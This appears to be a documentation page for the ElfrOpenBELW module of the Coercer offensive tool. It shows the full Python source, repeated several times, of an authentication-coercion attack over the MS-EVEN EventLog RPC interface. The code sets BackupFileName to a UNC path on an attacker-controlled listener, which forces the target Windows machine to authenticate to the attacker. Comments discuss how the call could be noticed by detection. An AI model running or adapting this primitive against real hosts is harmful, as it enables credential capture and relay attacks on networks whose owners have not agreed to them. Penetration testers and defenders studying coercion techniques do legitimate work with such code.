coercer.methods.MS_EVEN.ElfrOpenBELW
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : ElfrOpenBELW.py
# Author             : Podalirius (@podalirius_)
# Date created       : 11 Dec 2022


import random
from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5 import even
from impacket.dcerpc.v5.dtypes import NULL


class ElfrOpenBELW(MSPROTOCOLRPCCALL):
    """
    Authentication-coercion primitive built on ElfrOpenBELW (opnum 9) of
    [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f).

    The call asks the remote Event Log service to open a *backup* event log.
    Because ``BackupFileName`` is attacker-controlled, it is pointed at a UNC
    path on our listener (see ``exploit_paths``), so the target reaches out
    and authenticates to us. ``BackupFileName`` is therefore the only
    argument that matters for coercion (``vulnerable_arguments``).

    Spec for the function: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1

    Method found by:
     - [@evilashz](https://github.com/evilashz/)
    """

    # Path template handed to the framework. ``{{listener}}`` and
    # ``{{smb_listen_port}}`` are substituted by the caller; the port token
    # is presumably rendered with its own separator (or empty) since none is
    # written here -- verify against the template engine before changing it.
    exploit_paths = [
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa'),
    ]

    # Transports the framework may use to reach the interface.
    # NOTE(review): the key is spelled "ncan_np" rather than "ncacn_np";
    # presumably this matches what the framework looks up, so it is kept
    # as-is -- confirm before renaming.
    access = {
        "ncan_np": [
            dict(
                namedpipe=r"\PIPE\eventlog",
                uuid="82273fdc-e32a-18c3-3f78-827929dc23ea",
                version="0.0",
            ),
        ],
        "ncacn_ip_tcp": [
            dict(
                uuid="82273fdc-e32a-18c3-3f78-827929dc23ea",
                version="0.0",
            ),
        ],
    }

    protocol = dict(
        longname="[MS-EVEN]: EventLog Remoting Protocol",
        shortname="MS-EVEN",
    )

    function = dict(
        name="ElfrOpenBELW",
        opnum=9,
        vulnerable_arguments=["BackupFileName"],
    )

    def trigger(self, dcerpc_session, target):
        """
        Fire the ElfrOpenBELW request over an already-bound DCERPC session.

        Args:
            dcerpc_session: bound impacket DCERPC session, or None if
                ``connect()`` was never called.
            target: unused here; kept for the common trigger signature.

        Returns:
            "" when the request went through (the decoded response is
            dumped to stdout), the caught exception object when the RPC
            call failed, or None when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            # Drop trailing NUL padding before the value becomes an RPC string.
            self.path = self.path.rstrip('\x00')

            call = even.ElfrOpenBELW()
            call['UNCServerName'] = NULL
            # The coercion vector: a UNC path the Event Log service will open.
            call['BackupFileName'] = self.path
            # NOTE(review): random version numbers are non-standard for this
            # call and are a potential detection artefact; presumably the
            # server ignores them -- confirm on a real target.
            call['MajorVersion'] = random.randint(0, 100)
            call['MinorVersion'] = random.randint(0, 100)

            dcerpc_session.request(call).dump()
        except Exception as err:
            # Framework contract: hand the failure back instead of raising.
            return err

        return ""
class ElfrOpenBELW(MSPROTOCOLRPCCALL):
    """
    Authentication-coercion primitive built on ElfrOpenBELW (opnum 9) of
    [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f).

    The call asks the remote Event Log service to open a *backup* event log.
    Because ``BackupFileName`` is attacker-controlled, it is pointed at a UNC
    path on our listener (see ``exploit_paths``), so the target reaches out
    and authenticates to us. ``BackupFileName`` is therefore the only
    argument that matters for coercion (``vulnerable_arguments``).

    Spec for the function: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1

    Method found by:
     - [@evilashz](https://github.com/evilashz/)
    """

    # Path template handed to the framework. ``{{listener}}`` and
    # ``{{smb_listen_port}}`` are substituted by the caller; the port token
    # is presumably rendered with its own separator (or empty) since none is
    # written here -- verify against the template engine before changing it.
    exploit_paths = [
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa'),
    ]

    # Transports the framework may use to reach the interface.
    # NOTE(review): the key is spelled "ncan_np" rather than "ncacn_np";
    # presumably this matches what the framework looks up, so it is kept
    # as-is -- confirm before renaming.
    access = {
        "ncan_np": [
            dict(
                namedpipe=r"\PIPE\eventlog",
                uuid="82273fdc-e32a-18c3-3f78-827929dc23ea",
                version="0.0",
            ),
        ],
        "ncacn_ip_tcp": [
            dict(
                uuid="82273fdc-e32a-18c3-3f78-827929dc23ea",
                version="0.0",
            ),
        ],
    }

    protocol = dict(
        longname="[MS-EVEN]: EventLog Remoting Protocol",
        shortname="MS-EVEN",
    )

    function = dict(
        name="ElfrOpenBELW",
        opnum=9,
        vulnerable_arguments=["BackupFileName"],
    )

    def trigger(self, dcerpc_session, target):
        """
        Fire the ElfrOpenBELW request over an already-bound DCERPC session.

        Args:
            dcerpc_session: bound impacket DCERPC session, or None if
                ``connect()`` was never called.
            target: unused here; kept for the common trigger signature.

        Returns:
            "" when the request went through (the decoded response is
            dumped to stdout), the caught exception object when the RPC
            call failed, or None when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        try:
            # Drop trailing NUL padding before the value becomes an RPC string.
            self.path = self.path.rstrip('\x00')

            call = even.ElfrOpenBELW()
            call['UNCServerName'] = NULL
            # The coercion vector: a UNC path the Event Log service will open.
            call['BackupFileName'] = self.path
            # NOTE(review): random version numbers are non-standard for this
            # call and are a potential detection artefact; presumably the
            # server ignores them -- confirm on a real target.
            call['MajorVersion'] = random.randint(0, 100)
            call['MinorVersion'] = random.randint(0, 100)

            dcerpc_session.request(call).dump()
        except Exception as err:
            # Framework contract: hand the failure back instead of raising.
            return err

        return ""
Coerces the target machine into authenticating to an attacker-controlled listener by calling the ElfrOpenBELW function (opnum 9) of MS-EVEN (EventLog Remoting Protocol) with a UNC path in BackupFileName.
Method found by: @evilashz (https://github.com/evilashz/)
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\eventlog', 'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}], 'ncacn_ip_tcp': [{'uuid': '82273fdc-e32a-18c3-3f78-827929dc23ea', 'version': '0.0'}]}
def
trigger(self, dcerpc_session, target):
def trigger(self, dcerpc_session, target):
    """
    Fire the ElfrOpenBELW request over an already-bound DCERPC session.

    Args:
        dcerpc_session: bound impacket DCERPC session, or None if
            ``connect()`` was never called.
        target: unused here; kept for the common trigger signature.

    Returns:
        "" when the request went through (the decoded response is
        dumped to stdout), the caught exception object when the RPC
        call failed, or None when no session was supplied.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None

    try:
        # Drop trailing NUL padding before the value becomes an RPC string.
        self.path = self.path.rstrip('\x00')

        call = even.ElfrOpenBELW()
        call['UNCServerName'] = NULL
        # The coercion vector: a UNC path the Event Log service will open.
        call['BackupFileName'] = self.path
        # NOTE(review): random version numbers are non-standard for this
        # call and are a potential detection artefact; presumably the
        # server ignores them -- confirm on a real target.
        call['MajorVersion'] = random.randint(0, 100)
        call['MinorVersion'] = random.randint(0, 100)

        dcerpc_session.request(call).dump()
    except Exception as err:
        # Framework contract: hand the failure back instead of raising.
        return err

    return ""